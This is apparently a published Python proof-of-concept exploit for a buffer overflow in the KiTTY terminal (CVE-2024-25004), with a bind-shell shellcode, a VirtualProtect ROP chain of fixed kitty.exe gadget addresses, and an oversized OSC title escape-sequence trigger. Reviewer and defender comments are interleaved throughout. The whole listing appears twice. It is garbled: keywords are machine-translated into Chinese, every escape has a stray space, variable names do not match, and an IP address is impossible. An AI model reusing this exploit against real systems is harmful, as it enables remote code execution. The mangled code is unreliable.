# Exploit Title: kitty 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
# Exploit Author: DeFcesco (Austin A. Defrancesco)
# Vendor Homepage: https://github.com/cyd01/kitty/=
# Software Link: https://github.com/cyd01/kitty/releases/download/v0.76.1.1.13/kitty-bin-0.76.1.1.13.zip
# Version: <= 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: CVE-2024-25004
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#blog: https://blog.defcesco.io/hell0+kitty
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
# msf6 payload(Windows/shell_bind_tcp) to_handler                                      #
# [*] Payload handler started as job 1                                                 #
# msf6 payload(Windows/shell_bind_tcp)                                                 #
# [*] Started bind TCP handler against 192.168.100.28:444                              #
# [*] Command shell session 1 opened (192.168.100.119:34285 - 192.168.100.283:444)     #
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
导入系统
导入操作系统
导入结构
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
# msf6 payload(Windows/shell_bind_tcp) generate -b '\ x00 \ x07 \ x0a \ x0a \ x0d \ x1b \ x9c' -f py  ##
# Windows/shell_bind_tcp - 355 bytes                                                                #
#https://metasploit.com/#
#encoder: x86/shikata_ga_nai#
#verbose=false,lport=4444,rhost=192.168.100.28,#
#prependmigrate=false,exitfunc=process,createSession=true,#
#autoverifySession=true#
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
# Encoded payload bytes for the bind shell described in the header above
# (msfvenom Windows/shell_bind_tcp, encoder x86/shikata_ga_nai, reported as 355 bytes,
# lport=4444). The literals are concatenated into `buf` and embedded by shellCode().
# NOTE(review): as transcribed the literals are mangled -- a space after every
# backslash, repeated and truncated escapes -- so they do not evaluate to the
# 355 bytes the header describes. They are kept verbatim as a record of the
# published PoC, not as runnable code.
# Defender's note: what the header says this payload does (a shell listening on
# TCP 4444) is the post-trigger observable a host or network monitor would see.
buf=b''
buf +=b'\ xd9 \ xe9 \ xd9 \ x74 \ x24 \ xf4 \ xbd \ xbd \ xfe \ xb7 \ xb7 \ xa4 \ xa4 \ x99 \ x5e'
buf +=b'\ x29 \ xc9 \ xb1 \ x53 \ x83 \ xee \ xfc \ xfc \ x31 \ x6e \ x6e \ x13 \ x13 \ x03 \ x90'
buf +=b'\ xa4 \ x46 \ x6c \ x90 \ x23 \ x04 \ x8f \ x68 \ xb4 \ xb4 \ x69 \ x19 \ x19 \ x8d'
buf +=b'\ x85 \ xa9 \ x7d \ xc6 \ xb6 \ x19 \ xf5 \ xf5 \ x8a \ x3a \ x3a \ xd1 \ xd1 \ x5b \ x3e''
buf +=b'\ xc8 \ x97 \ x73 \ x31 \ x79 \ x1d \ x1d \ xa2 \ x7c \ x7a \ x7a \ x0e \ x0e \ x96 \ x1f'
buf +=b'\ xf8 \ x4d \ xcb \ xff \ xf \ xc1 \ x9d \ x1e \ xfe \ xfe \ x06 \ xc3 \ xc3 \ xd3 \ x52'
buf +=b'\ xde \ x8f \ x46 \ x42 \ x6b \ xc5 \ x5a \ x5a \ xe9 \ x27 \ x27 \ xcb \ xda \ xda \ x0e'
buf +=b'\ xff \ xea \ xcb \ x81 \ x8b \ xb4 \ xcb \ xcb \ x20 \ x5f \ xcd \ xcd \ x45 \ x3a''
buf +=b'\ xbc \ xe8 \ x1c \ xb1 \ x76 \ x86 \ x9e \ x9e \ x13 \ x47 \ x47 \ x67 \ x67 \ x0c \ x5a''
buf +=b'\ x67 \ x9a \ x4c \ x9b \ x40 \ x45 \ x3b \ x3b \ xd5 \ xb2 \ xb2 \ xf8 \ x3c \ x3c \ x22'
buf +=b'\ xc8 \ x26 \ xc8 \ xb0 \ x6a \ xac \ x6a \ x6a \ x1c \ x8a \ x8a \ x61 \ x61 \ xec \ xd7'
buf +=b'\ x80 \ xce \ x7a \ xbf \ x84 \ xd1 \ xaf \ xb4 \ xb4 \ xb1 \ x5a \ x5a \ x4e \ x1a''
buf +=b'\ x30 \ x18 \ x75 \ xbe \ x18 \ xfa \ x14 \ x14 \ xe7 \ xc4 \ xc4 \ xad \ x29 \ xf7'
buf +=b'\ xa6 \ x12 \ x8c \ x7c \ x4a \ x46 \ x46 \ xbd \ xdf \ xdf \ x03 \ xab \ xab \ x8c \ x8c \ xdf'
buf +=b'\ xd3 \ xa3 \ x87 \ xac \ xe1 \ x6c \ x3c \ x3c \ x3a \ x4a \ x4a \ xe4 \ xe4 \ x9a \ xbd'
buf +=b'\ xad \ xdf \ x5b \ x51 \ x50 \ xe0 \ x9b \ x78 \ x78 \ x97 \ xb4 \ xb4 \ xcb \ xcb \ x12'
buf +=b'\ x3e \ xb5 \ x87 \ xe2 \ xbf \ x60 \ x3d \ x3d \ xea \ x66 \ x66 \ xdb \ x20 \ x17'
buf +=b'\ xd8 \ x8b \ xe4 \ xb7 \ xb1 \ xc1 \ xea \ xea \ xe8 \ xa2 \ xe9 \ xe9 \ x20 \ x81'
buf +=b'\ x4b \ x14 \ xcb \ xbc \ xd7 \ x91 \ x2d \ x2d \ xd4 \ xf7 \ xf7 \ xf7 \ xf7 \ xe6 \ x40'
buf +=b'\ x3a \ x2c \ x3f \ xf7 \ x45 \ x06 \ x17 \ x17 \ x9f \ x0e \ x40 \ x40 \ xa0 \ xa0 \ xa0'
buf +=b'\ x8e \ x46 \ x86 \ x36 \ x05 \ x85 \ x85 \ x12 \ x27 \ x1a \ x1a \ x80 \ x80 \ x32 \ x30'
buf +=b'\ x8d \ x5e \ xd3 \ x73 \ x2f \ x5e \ xfe \ xfe \ xe3 \ xcc \ xcd \ xcd \ x65 \ x65 \ xf3'
buf +=b'\ x9b \ xed \ x31 \ xa4 \ xcc \ xc0 \ x4b \ x4b \ x20 \ xe1 \ x7b \ x7b \ xe2 \ x56'
buf +=b'\ xf8 \ x1a \ xcd \ xd2 \ xd2 \ x27 \ xdf \ xd0 \ xdb \ xdb \ xaa \ x5b \ x5b \ xf7 \ xf7 \ xcb'
buf +=b'\ x72 \ x63 \ xb3 \ xbf \ x2a \ x32 \ x6d \ x6d \ x69 \ x8d \ x8d \ xec \ xdf \ xdf \ xc3'
buf +=b'\ x47 \ x42 \ xb6 \ x83 \ x1e \ xa8 \ x09 \ xd5 \ xd5 \ x1e \ xe5 \ xe5 \ xff \ xff \ x39'
buf +=b'\ xae \ x50 \ x46 \ x46 \ x1f \ x35 \ x4e \ x4e \ x3f \ x7d \ xa5 \ xa5 \ xb1 \ xb1 \ xea'
buf +=b'\ xc5 \ xd5 \ xfb \ xb6 \ x6c \ x7e \ xa2 \ x23 \ x2d \ x2d \ xe3 \ xe3 \ x55 \ x9e'''
buf +=b'\ x72 \ x1a \ xd6 \ x2a \ x0b \ xd9 \ xc6 \ xc6 \ x5f \ x0e \ xa5 \ xa5 \ x40 \ x40 \ x8c'
buf +=b'\ x62 \ xb6 \ x24 \ xb2 \ xd1 \ xb7 \ x6c'
def shellCode():
# Builds the fixed-size body that precedes the return address in the trigger:
# a short stub that adjusts ESP by a constant (see the inline mov/sub annotations),
# then the encoded payload `buf`, then 0x90 filler up to exactly 1042 bytes. The
# size is asserted before returning and matches the "ESP: 1042 bytes" note later
# in the file.
# NOTE(review): this listing is mangled as transcribed (translated keywords,
# inconsistent identifier casing, a space after every escape backslash) and does
# not parse; it is kept verbatim as a record of the published PoC, not corrected.
SC=B''
sc +=b'\ xbb \ x44 \ x24 \ x44 \ x44'#mov ebx,0x4444424444
sc +=b'\ xb8 \ x44 \ x44 \ x44 \ x44'#mov eax,0x4444444444444
sc +=b'\ x29 \ xd8'#sub eax,ebx
sc +=b'\ x29 \ xc4'#sub esp,eax
sc +=buf
# Pad with NOPs so the body is always 1042 bytes regardless of payload length.
sc +=b'\ x90' *(1042-len(sc))
断言Len(SC)==1042
返回SC
def create_rop_chain():
# ROP chain generated with mona.py - www.corelan.be
# Stages a VirtualProtect call through the kitty.exe IAT pointer annotated below
# and dispatches it with the closing `pushad # retn` (standard mona layout):
#   ESI -> VirtualProtect pointer (loaded via the `mov eax,[eax]` / `xchg` gadgets)
#   EBP -> `push esp; retn`, so the return after the call lands back on the stack
#   EBX  = 0x201 (size), EDX = 0x40 (new protection; PAGE_EXECUTE_READWRITE)
#   ECX -> a writable location (presumably the old-protection out-parameter)
#   EDI -> a bare `retn` (rop nop), EAX -> a nop value
# Every gadget is a fixed address inside kitty.exe, so the chain presumably only
# matches the 0.76.1.13 build named in the header -- confirm before relying on it.
# Defender's note: those fixed addresses also make the packed chain a stable byte
# pattern to hunt for inside an oversized OSC title sequence.
# NOTE(review): the list close and the return line at the bottom are mangled in
# transcription and kept verbatim; the function does not parse as written.
rop_gadgets=[
#[--- INFO:GADGETS_TO_SET_ESI: ---]
0x004c5832,  # pop eax # add esp,14 # pop ebx # pop esi # retn [kitty.exe]
0x006424a4,  # ptr to VirtualProtect() [IAT kitty.exe]
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x00484E07,  # mov eax,dword ptr ds:[eax] # retn [kitty.exe]
0x00473cf6,  # xchg eax,esi # retn [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBP: ---]
0x00429953,  # pop ebp # retn [kitty.exe]
0x005405b0,  # push esp; retn 0 [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBX: ---]
0x0049d9f9,  # pop ebx # retn [kitty.exe]
0x00000201,  # 0x00000201 -> ebx
#[--- INFO:GADGETS_TO_SET_EDX: ---]
0x00430dce,  # pop edx # retn [kitty.exe]
0x00000040,  # 0x00000040 -> edx
#[--- INFO:GADGETS_TO_SET_ECX: ---]
0x005ac58c,  # pop ecx # retn [kitty.exe]
0x004d81d9,  # Writable location [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EDI: ---]
0x004fa404,  # pop edi # retn [kitty.exe]
0x005A2001,  # retn (rop nop) [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EAX: ---]
0x004CD011,  # pop eax # pop ebx # retn [kitty.exe]
0x90909090,  # nop
0x41414141,  # Filler (compensate)
# (the next two lines appear to be one mona banner, "[--- INFO:PUSHAD: ---]",
# split across lines in transcription)
#[--- INFO
USHAD: ---]
0x005dfbac,  # pushad # retn [kitty.exe]
这是给出的
返回b''。join(struct.pack('i',), in rop_gadgets)
# Assembles the full trigger and writes it to stdout. Layout, from the notes that
# follow: OSC title prefix, the 1042-byte body from shellCode(), the return address
# 0x00529720 (an `add esp,134` stack pivot in kitty.exe), 27 bytes of filler, the
# ROP chain, a 5-byte relative jmp back into the body (the "JMP $ EIP-1471" note),
# 88 NOPs, and the BEL terminator.
rop_chain=create_rop_chain()
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
# badchars: \ x00 \ x07 \ x0a \ x0d \ x1b \ x9c \ x9d  ##
# Return address info: 0x00529720 : {pivot 324 /0x144} :  #
# ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # retn  #
#** [kitty.exe] ** | startnull {page_execute_readwrite}#
# ESP: 1042 bytes  # shellcode size  #
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
return_address=struct.pack('i',0x00529720)  # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EDI # POP EBP # retn ** [KITTY.EXE] ** | startnull {page_execute_readwrite}
rop_chain_padding=b'\ x90' * 27
nops=b'\ x90' * 88
# OSC 0 ("set window title") sequence: ESC ] 0 ; <text> ... BEL. The `__dt:localhost:`
# prefix followed by the oversized body is presumably the "duplicated session
# username" field named in the header's title -- confirm against the vendor advisory.
Escape_sequence=B'\ 033] 0; __ dt:localhost:' + shellCode() + return_address
evase_sequence +=rop_chain_padding + rop_chain
Escape_Sequence +=B'\ Xe9 \ X3D \ Xfa \ XFF \ XFF'#JMP $ EIP-1471
Escape_sequence +=NOPS + B'\ 007'
# Write the raw bytes on fd 1 in binary mode so no text encoding or newline
# translation alters them; presumably a vulnerable client rendering this output
# is the intended receiver.
# Defender's note: a title-setting escape sequence over a kilobyte long with long
# 0x90 runs is unlikely to be legitimate and is a reasonable detection signature;
# the header lists versions <= 0.76.1.13 as affected.
stdout=os.fdopen(sys.stdout.fileno(),'wb')
stdout.write(easse_sequence)
stdout.flush()
# Exploit Author: DeFcesco (Austin A. Defrancesco)
# Vendor Homepage: https://github.com/cyd01/kitty/=
# Software Link: https://github.com/cyd01/kitty/releases/download/v0.76.1.1.13/kitty-bin-0.76.1.1.13.zip
# Version: <= 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: CVE-2024-25004
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#blog: https://blog.defcesco.io/hell0+kitty
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
# msf6 payload(Windows/shell_bind_tcp) to_handler                                      #
# [*] Payload handler started as job 1                                                 #
# msf6 payload(Windows/shell_bind_tcp)                                                 #
# [*] Started bind TCP handler against 192.168.100.28:444                              #
# [*] Command shell session 1 opened (192.168.100.119:34285 - 192.168.100.283:444)     #
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
导入系统
导入操作系统
导入结构
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
# msf6 payload(Windows/shell_bind_tcp) generate -b '\ x00 \ x07 \ x0a \ x0a \ x0d \ x1b \ x9c' -f py  ##
# Windows/shell_bind_tcp - 355 bytes                                                                #
#https://metasploit.com/#
#encoder: x86/shikata_ga_nai#
#verbose=false,lport=4444,rhost=192.168.100.28,#
#prependmigrate=false,exitfunc=process,createSession=true,#
#autoverifySession=true#
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
# Encoded payload bytes for the bind shell described in the header above
# (msfvenom Windows/shell_bind_tcp, encoder x86/shikata_ga_nai, reported as 355 bytes,
# lport=4444). The literals are concatenated into `buf` and embedded by shellCode().
# NOTE(review): as transcribed the literals are mangled -- a space after every
# backslash, repeated and truncated escapes -- so they do not evaluate to the
# 355 bytes the header describes. They are kept verbatim as a record of the
# published PoC, not as runnable code.
# Defender's note: what the header says this payload does (a shell listening on
# TCP 4444) is the post-trigger observable a host or network monitor would see.
buf=b''
buf +=b'\ xd9 \ xe9 \ xd9 \ x74 \ x24 \ xf4 \ xbd \ xbd \ xfe \ xb7 \ xb7 \ xa4 \ xa4 \ x99 \ x5e'
buf +=b'\ x29 \ xc9 \ xb1 \ x53 \ x83 \ xee \ xfc \ xfc \ x31 \ x6e \ x6e \ x13 \ x13 \ x03 \ x90'
buf +=b'\ xa4 \ x46 \ x6c \ x90 \ x23 \ x04 \ x8f \ x68 \ xb4 \ xb4 \ x69 \ x19 \ x19 \ x8d'
buf +=b'\ x85 \ xa9 \ x7d \ xc6 \ xb6 \ x19 \ xf5 \ xf5 \ x8a \ x3a \ x3a \ xd1 \ xd1 \ x5b \ x3e''
buf +=b'\ xc8 \ x97 \ x73 \ x31 \ x79 \ x1d \ x1d \ xa2 \ x7c \ x7a \ x7a \ x0e \ x0e \ x96 \ x1f'
buf +=b'\ xf8 \ x4d \ xcb \ xff \ xf \ xc1 \ x9d \ x1e \ xfe \ xfe \ x06 \ xc3 \ xc3 \ xd3 \ x52'
buf +=b'\ xde \ x8f \ x46 \ x42 \ x6b \ xc5 \ x5a \ x5a \ xe9 \ x27 \ x27 \ xcb \ xda \ xda \ x0e'
buf +=b'\ xff \ xea \ xcb \ x81 \ x8b \ xb4 \ xcb \ xcb \ x20 \ x5f \ xcd \ xcd \ x45 \ x3a''
buf +=b'\ xbc \ xe8 \ x1c \ xb1 \ x76 \ x86 \ x9e \ x9e \ x13 \ x47 \ x47 \ x67 \ x67 \ x0c \ x5a''
buf +=b'\ x67 \ x9a \ x4c \ x9b \ x40 \ x45 \ x3b \ x3b \ xd5 \ xb2 \ xb2 \ xf8 \ x3c \ x3c \ x22'
buf +=b'\ xc8 \ x26 \ xc8 \ xb0 \ x6a \ xac \ x6a \ x6a \ x1c \ x8a \ x8a \ x61 \ x61 \ xec \ xd7'
buf +=b'\ x80 \ xce \ x7a \ xbf \ x84 \ xd1 \ xaf \ xb4 \ xb4 \ xb1 \ x5a \ x5a \ x4e \ x1a''
buf +=b'\ x30 \ x18 \ x75 \ xbe \ x18 \ xfa \ x14 \ x14 \ xe7 \ xc4 \ xc4 \ xad \ x29 \ xf7'
buf +=b'\ xa6 \ x12 \ x8c \ x7c \ x4a \ x46 \ x46 \ xbd \ xdf \ xdf \ x03 \ xab \ xab \ x8c \ x8c \ xdf'
buf +=b'\ xd3 \ xa3 \ x87 \ xac \ xe1 \ x6c \ x3c \ x3c \ x3a \ x4a \ x4a \ xe4 \ xe4 \ x9a \ xbd'
buf +=b'\ xad \ xdf \ x5b \ x51 \ x50 \ xe0 \ x9b \ x78 \ x78 \ x97 \ xb4 \ xb4 \ xcb \ xcb \ x12'
buf +=b'\ x3e \ xb5 \ x87 \ xe2 \ xbf \ x60 \ x3d \ x3d \ xea \ x66 \ x66 \ xdb \ x20 \ x17'
buf +=b'\ xd8 \ x8b \ xe4 \ xb7 \ xb1 \ xc1 \ xea \ xea \ xe8 \ xa2 \ xe9 \ xe9 \ x20 \ x81'
buf +=b'\ x4b \ x14 \ xcb \ xbc \ xd7 \ x91 \ x2d \ x2d \ xd4 \ xf7 \ xf7 \ xf7 \ xf7 \ xe6 \ x40'
buf +=b'\ x3a \ x2c \ x3f \ xf7 \ x45 \ x06 \ x17 \ x17 \ x9f \ x0e \ x40 \ x40 \ xa0 \ xa0 \ xa0'
buf +=b'\ x8e \ x46 \ x86 \ x36 \ x05 \ x85 \ x85 \ x12 \ x27 \ x1a \ x1a \ x80 \ x80 \ x32 \ x30'
buf +=b'\ x8d \ x5e \ xd3 \ x73 \ x2f \ x5e \ xfe \ xfe \ xe3 \ xcc \ xcd \ xcd \ x65 \ x65 \ xf3'
buf +=b'\ x9b \ xed \ x31 \ xa4 \ xcc \ xc0 \ x4b \ x4b \ x20 \ xe1 \ x7b \ x7b \ xe2 \ x56'
buf +=b'\ xf8 \ x1a \ xcd \ xd2 \ xd2 \ x27 \ xdf \ xd0 \ xdb \ xdb \ xaa \ x5b \ x5b \ xf7 \ xf7 \ xcb'
buf +=b'\ x72 \ x63 \ xb3 \ xbf \ x2a \ x32 \ x6d \ x6d \ x69 \ x8d \ x8d \ xec \ xdf \ xdf \ xc3'
buf +=b'\ x47 \ x42 \ xb6 \ x83 \ x1e \ xa8 \ x09 \ xd5 \ xd5 \ x1e \ xe5 \ xe5 \ xff \ xff \ x39'
buf +=b'\ xae \ x50 \ x46 \ x46 \ x1f \ x35 \ x4e \ x4e \ x3f \ x7d \ xa5 \ xa5 \ xb1 \ xb1 \ xea'
buf +=b'\ xc5 \ xd5 \ xfb \ xb6 \ x6c \ x7e \ xa2 \ x23 \ x2d \ x2d \ xe3 \ xe3 \ x55 \ x9e'''
buf +=b'\ x72 \ x1a \ xd6 \ x2a \ x0b \ xd9 \ xc6 \ xc6 \ x5f \ x0e \ xa5 \ xa5 \ x40 \ x40 \ x8c'
buf +=b'\ x62 \ xb6 \ x24 \ xb2 \ xd1 \ xb7 \ x6c'
def shellCode():
# Builds the fixed-size body that precedes the return address in the trigger:
# a short stub that adjusts ESP by a constant (see the inline mov/sub annotations),
# then the encoded payload `buf`, then 0x90 filler up to exactly 1042 bytes. The
# size is asserted before returning and matches the "ESP: 1042 bytes" note later
# in the file.
# NOTE(review): this listing is mangled as transcribed (translated keywords,
# inconsistent identifier casing, a space after every escape backslash) and does
# not parse; it is kept verbatim as a record of the published PoC, not corrected.
SC=B''
sc +=b'\ xbb \ x44 \ x24 \ x44 \ x44'#mov ebx,0x4444424444
sc +=b'\ xb8 \ x44 \ x44 \ x44 \ x44'#mov eax,0x4444444444444
sc +=b'\ x29 \ xd8'#sub eax,ebx
sc +=b'\ x29 \ xc4'#sub esp,eax
sc +=buf
# Pad with NOPs so the body is always 1042 bytes regardless of payload length.
sc +=b'\ x90' *(1042-len(sc))
断言Len(SC)==1042
返回SC
def create_rop_chain():
# ROP chain generated with mona.py - www.corelan.be
# Stages a VirtualProtect call through the kitty.exe IAT pointer annotated below
# and dispatches it with the closing `pushad # retn` (standard mona layout):
#   ESI -> VirtualProtect pointer (loaded via the `mov eax,[eax]` / `xchg` gadgets)
#   EBP -> `push esp; retn`, so the return after the call lands back on the stack
#   EBX  = 0x201 (size), EDX = 0x40 (new protection; PAGE_EXECUTE_READWRITE)
#   ECX -> a writable location (presumably the old-protection out-parameter)
#   EDI -> a bare `retn` (rop nop), EAX -> a nop value
# Every gadget is a fixed address inside kitty.exe, so the chain presumably only
# matches the 0.76.1.13 build named in the header -- confirm before relying on it.
# Defender's note: those fixed addresses also make the packed chain a stable byte
# pattern to hunt for inside an oversized OSC title sequence.
# NOTE(review): the list close and the return line at the bottom are mangled in
# transcription and kept verbatim; the function does not parse as written.
rop_gadgets=[
#[--- INFO:GADGETS_TO_SET_ESI: ---]
0x004c5832,  # pop eax # add esp,14 # pop ebx # pop esi # retn [kitty.exe]
0x006424a4,  # ptr to VirtualProtect() [IAT kitty.exe]
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x41414141,  # Filler (compensate)
0x00484E07,  # mov eax,dword ptr ds:[eax] # retn [kitty.exe]
0x00473cf6,  # xchg eax,esi # retn [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBP: ---]
0x00429953,  # pop ebp # retn [kitty.exe]
0x005405b0,  # push esp; retn 0 [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBX: ---]
0x0049d9f9,  # pop ebx # retn [kitty.exe]
0x00000201,  # 0x00000201 -> ebx
#[--- INFO:GADGETS_TO_SET_EDX: ---]
0x00430dce,  # pop edx # retn [kitty.exe]
0x00000040,  # 0x00000040 -> edx
#[--- INFO:GADGETS_TO_SET_ECX: ---]
0x005ac58c,  # pop ecx # retn [kitty.exe]
0x004d81d9,  # Writable location [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EDI: ---]
0x004fa404,  # pop edi # retn [kitty.exe]
0x005A2001,  # retn (rop nop) [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EAX: ---]
0x004CD011,  # pop eax # pop ebx # retn [kitty.exe]
0x90909090,  # nop
0x41414141,  # Filler (compensate)
# (the banner below is truncated in transcription; presumably "[--- INFO:PUSHAD: ---]")
#[--- INFO

0x005dfbac,  # pushad # retn [kitty.exe]
这是给出的
返回b''。join(struct.pack('i',), in rop_gadgets)
# Assembles the full trigger and writes it to stdout. Layout, from the notes that
# follow: OSC title prefix, the 1042-byte body from shellCode(), the return address
# 0x00529720 (an `add esp,134` stack pivot in kitty.exe), 27 bytes of filler, the
# ROP chain, a 5-byte relative jmp back into the body (the "JMP $ EIP-1471" note),
# 88 NOPs, and the BEL terminator.
rop_chain=create_rop_chain()
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
# badchars: \ x00 \ x07 \ x0a \ x0d \ x1b \ x9c \ x9d  ##
# Return address info: 0x00529720 : {pivot 324 /0x144} :  #
# ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # retn  #
#** [kitty.exe] ** | startnull {page_execute_readwrite}#
# ESP: 1042 bytes  # shellcode size  #
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
return_address=struct.pack('i',0x00529720)  # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EDI # POP EBP # retn ** [KITTY.EXE] ** | startnull {page_execute_readwrite}
rop_chain_padding=b'\ x90' * 27
nops=b'\ x90' * 88
# OSC 0 ("set window title") sequence: ESC ] 0 ; <text> ... BEL. The `__dt:localhost:`
# prefix followed by the oversized body is presumably the "duplicated session
# username" field named in the header's title -- confirm against the vendor advisory.
Escape_sequence=B'\ 033] 0; __ dt:localhost:' + shellCode() + return_address
evase_sequence +=rop_chain_padding + rop_chain
Escape_Sequence +=B'\ Xe9 \ X3D \ Xfa \ XFF \ XFF'#JMP $ EIP-1471
Escape_sequence +=NOPS + B'\ 007'
# Write the raw bytes on fd 1 in binary mode so no text encoding or newline
# translation alters them; presumably a vulnerable client rendering this output
# is the intended receiver.
# Defender's note: a title-setting escape sequence over a kilobyte long with long
# 0x90 runs is unlikely to be legitimate and is a reasonable detection signature;
# the header lists versions <= 0.76.1.13 as affected.
stdout=os.fdopen(sys.stdout.fileno(),'wb')
stdout.write(easse_sequence)
stdout.flush()